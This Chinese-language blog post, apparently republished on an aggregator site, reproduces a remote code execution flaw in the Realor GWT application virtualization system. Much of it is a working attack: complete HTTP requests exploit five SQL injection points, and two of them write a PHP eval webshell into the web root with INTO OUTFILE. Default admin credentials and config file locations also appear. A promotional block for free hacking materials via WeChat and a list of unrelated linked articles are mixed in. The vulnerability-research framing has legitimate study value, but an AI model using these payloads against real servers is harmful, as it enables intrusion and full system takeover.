记一次某应用虚拟化系统远程代码执行

这篇具有很好参考价值的文章主要介绍了记一次某应用虚拟化系统远程代码执行。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

漏洞简介

  微步在线漏洞团队通过“X漏洞奖励计划”获取到瑞友天翼应用虚拟化系统远程代码执行漏洞情报(0day),攻击者可以通过该漏洞执行任意代码,导致系统被攻击与控制。瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台,它将用户各种应用软件集中部署到瑞友天翼服务集群,客户端通过WEB即可访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等。

  漏洞是因为未授权接口在接收参数时没有进行处理校验,存在 SQL 注入漏洞,又因为集成环境中的 mysql 拥有写入文件的权限,所以写入 webshell 最终导致代码执行。

影响版本

  5.x <= 瑞友天翼应用虚拟化系统(GWT System) <= 7.0.2. 

       目前相关漏洞已修复。

环境搭建

  从师傅处拷到的安装包 Gwt7.0.2.1.exe 默认模式安装,最后

  ​​

  ​​

  在线注册获取试用 http://mop.realor.cn/TrialReg.aspx

  ​注册成功后

  ​登录页面 默认账号密码是 Admin/123

  ​​

  默认路径在 C:/Program Files (x86)/RealFriend/Rap Server/WebRoot

  ​

  默认数据库配置地址 C:\Program Files (x86)\RealFriend\Rap Server\data\Config\CasDbCnn.dat

  ​​

  账号密码需要将其中的 # 替换为 = 并进行 base64 解码

【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】

 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)

漏洞复现与分析

  通过 http://192.168.222.148/RAPAgent.XGI?CMD=GetRegInfo​ 查看版本信息

  ​​

  为了方便查看后端实际执行的完整sql,我们可以使用框架提供的 getLastSql() 方法来 获取最近一次执行的SQL语句

  ​​

注入一IndexController.class.phpdologin

  ​webroot/casweb/Home/Controller/IndexController.class.php:dologin

  ​我们看到其中的 SQL 语句以及对该函数的请求路由

  ​http://www.casweb.cn.x/index.php?s=/Index/dologin/name/admin/pwd/c4ca4238a0b923820dcc509a6f75849b

  构造数据包 并打印出相对应的 sql 语句

  ​因为默认没有开启验证码,所以可以直接到达 SQL 语句处

  因为搭建环境时,使用了集成好的mysql 环境,拥有 DBA 的权限,所以可以在文件夹任意位置写入内容

show global variables like '%secure%';

  ​​

  secure_file_priv='' #允许写入到任何文件夹

  利用报错信息得到项目的绝对路径

  ​构造payload

POST /index.php?s=/Index/dologin/name HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 221
​
name=1')+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, '<?php eval($_REQUEST["cmd"]);?>' into outfile 'C:/Program Files (x86)/RealFriend/Rap Server/WebRoot/dologin.php'#

  ​​​​

  ​​

查询管理员用户的账户和密码

  ​​

注入二__ConsoleExternalUploadApi.XGI

  ​webroot/ConsoleExternalUploadApi.XGI

  ​获取到三个参数,当三个参数都不为空时,调用 getfarminfo​ 来进行处理

  ​webroot/Function.XGI

  ​​​

  ​webroot/Common.XGI

  ​对 key 值没有做任何校验,所以可以构造 payload 实现注入

POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
​
initParams=1&sign=2&key=FarmName'and sleep(5)#

  修改了代码 打印出了 SQL 命令

  ​构造实现注入写入文件

POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 170
Content-Type: application/x-www-form-urlencoded
​
initParams=1&sign=1&key=1'union select '<?php eval($_REQUEST["cmd"]);?>' into outfile 'C:/Program Files (x86)/RealFriend/Rap Server/WebRoot/ConsoleExternalUploadApi.php'#

  ​​

  ​​

  ​​

注入三ConsoleExternalUploadApi.XGIuploadAuthorizeKeyFile

POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
​
initParams=command_uploadAuthorizeKeyFile__user_admin'and+sleep(5)#__pwd_1&key=inner&sign=d3adb9869bd6a377fa452930d920fd10

  ​​

注入四ConsoleExternalApi.XGIcreateUser

  ‍

  之后的漏洞大抵上都可以描述为同一个漏洞,只是因为参数的不同,传入到不同的位置,在这里仅仅用一个来举例,之后的不再详细进行分析

  我们从 ConsoleExternalApi.XGI 进行分析

  ​通过 REQUEST 方法获取到参数

  ​通过接下来的这段代码,我们可以得到如下结论,当 $key 的值为 inner​ 时,$keyVal 是一个固定值,$sign 的值是 md5($initparams . $keyVal);​ $initparams 中需要包含 __​ 来分割数据,得到每个参数

  ​然后再通过 _​ 分割 得到每个参数所对应的值 也就是当传入的值是 a_1__b_2 最后得到的也就是 a=1&b=2

  继续向下分析

  ​当传入的 cmd 的值是 createUser​ 时,进入相对应的分支,构造相对应的语句就可以实现注入。

POST /ConsoleExternalApi.XGI?initParams=command_createUser__user_admin__pwd_1&key=inner&sign=bd58378906794858b1f57eb272e5d84f HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 46
Content-Type: application/json
​
{"account":"1'or sleep(5)#",
"userPwd":"1"}

  ​​

  ‍

注入五 ConsoleExternalApi.XGIgetUserDetailByAccount

POST /ConsoleExternalApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
​
initParams=command_getUserDetailByAccount__user_admin__account_1' or sleep(5) and '1&key=inner&sign=e24b8206a168347821a2f10aede99058

  ​

更多靶场实验练习、网安学习资料,请点击这里>>

 文章来源地址https://www.toymoban.com/news/detail-425717.html

到了这里,关于记一次某应用虚拟化系统远程代码执行的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 云计算虚拟化技术与开发-------虚拟化技术应用第二章内容(CPU虚拟机X86要解决的问题、VT-x、VMX、vCPU、EPT、VT-d)

    目录 第二章:虚拟化实现技术架构 CPU虚拟机要解决的问题(x86处理器结构漏洞)及软硬件解决方案 intel VT-x的技术特点,VMX(非根操作)的操作模式及操作流程 vCPU的组成和基本操作 内存虚拟化的地址映射问题 Intel EPT的基本概念及地址转换实现过程 Intel VT-d的技术特点以及

    2024年02月04日
    浏览(53)
  • 如何在PD虚拟机中开启系统的嵌套虚拟化功能?

    PD虚拟机是一款可以在Mac电脑中设置Windows系统的应用软件。在ParallelsDesktop虚拟机中如何开启系统的嵌套虚拟化功能?下面我们分享一下具体的操作步骤。 1、打开Mac电脑中ParallelsDesktop虚拟机, 2、选择虚拟系统的“ 设置 ”选项, 3、在弹出的窗口中,点击“ 硬件 ”标签;

    2024年02月13日
    浏览(43)
  • 【Linux系统】电脑/BIOS中开启虚拟化

    在虚拟机创建的过程中,有些人可能会遇到电脑 虚拟化禁用 的情况,遇到这种情况要怎么解决呢?要怎么操作才能开启虚拟化呢?这篇文章即将解决你的困惑。 首先我们将电脑处于关机状态,开机过程中按F2进入BIOS,开启虚拟化;(必不可少)详细步骤见下文。 之后在控制

    2024年02月10日
    浏览(36)
  • Mac OS装Windows系统开启虚拟化

    在开发工作中,很多软件需要用到 virtual box ,但是使用 virtual box 需要开启虚拟化,而有些苹果笔记本虚拟化是关闭的,需要手动开启,我们知道 Windows 下开启虚拟化直接进入 bios 简单操作即可,但是苹果笔记本没有 bios 如何开启虚拟化呢?这里分两种情况:苹果电笔记本的

    2024年02月09日
    浏览(39)
  • PVE虚拟化平台之安装iStoreOS软路由系统

    iStoreOS 目标是提供一个人人会用的路由兼轻 NAS 系统,iStoreOS 来源于 OpenWRT,重点是做了很多很多的交互简化,不管是作为路由还是 NAS,你都有相似的操作体验。 只填写名称,VM ID即为虚拟机ID,自动排序的,也可自定义,其余不管,下一步; 选择不需要任何介质; 选择默认配

    2024年02月11日
    浏览(39)
  • PVE虚拟化平台之安装openKylin开源操作系统

    openKylin 1.0版本操作系统目前适配支持X86、ARM、RISC-V三个架构的个人电脑、平板电脑及教育开发板,可以满足绝大多数个人用户及开发者的使用需求!其中ARM架构完成了树莓派Raspberry Pi、易研科技Cool Pi、武汉双椒派Chillie Pi等开发板适配,RISC-V架构完成了赛昉VisonFive2、SiFive H

    2024年02月14日
    浏览(41)
  • docker、LXC、LXD的区别及传统的虚拟机与操作系统虚拟化的区别

    Docker是一个用于在集中式平台上创建、部署和运行应用程序的开源工具。这使得主机的操作系统通过容器运行具有相同Linux内核的应用程序,而不是创建一个完整的虚拟机。使用docker容器不需要考虑Ram和磁盘空间的分配。它能够自己处理这些需求。 Docker只提供了应用程序的虚

    2023年04月08日
    浏览(47)
  • 【云计算与虚拟化】第三章 实验二 在ESXi主机中安装操作系统

    实验二  在ESXi主机中安装操作系统 为ESXi主机添加一块数据存储磁盘,大小为80G,磁盘名称为:ESXi-loc-80G (截图)   2.登录vSphere Client,加载新添加的数据存储磁盘,加载大小为60G,并将其格式化为VMFS5,标识为ESXi-loc-80G, (截图) 3.在ESXi主机中新建Windows7虚拟机,虚拟机名

    2024年02月03日
    浏览(47)
  • 从云计算到物联网:虚拟化技术的演变与嵌入式系统的融合

    随着物联网设备的爆炸式增长和万物互联应用的快速发展,嵌入式系统正面临着一系列的挑战与机遇。为了适应这一变革,虚拟化技术逐渐成为了业界关注的焦点,并在嵌入式系统中得到了广泛的应用。本文将深入探讨嵌入式系统为何需要虚拟化技术,以及这一跨界创新组合

    2024年02月03日
    浏览(41)
  • 什么是网络虚拟化 网络虚拟化简介

    这个概念产生的比较久了,VLAN,VPN, VPLS等 都可以归为网络虚拟化的技术。近年来,云计算的浪潮席卷IT界。几乎所有的IT基础构架都在朝着云的方向发展。在云计算的发展中,虚拟化技术一直是重要的推动因素。作为基础构架,服务器和存储的虚拟化已经发展的有声有色,

    2024年02月05日
    浏览(50)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包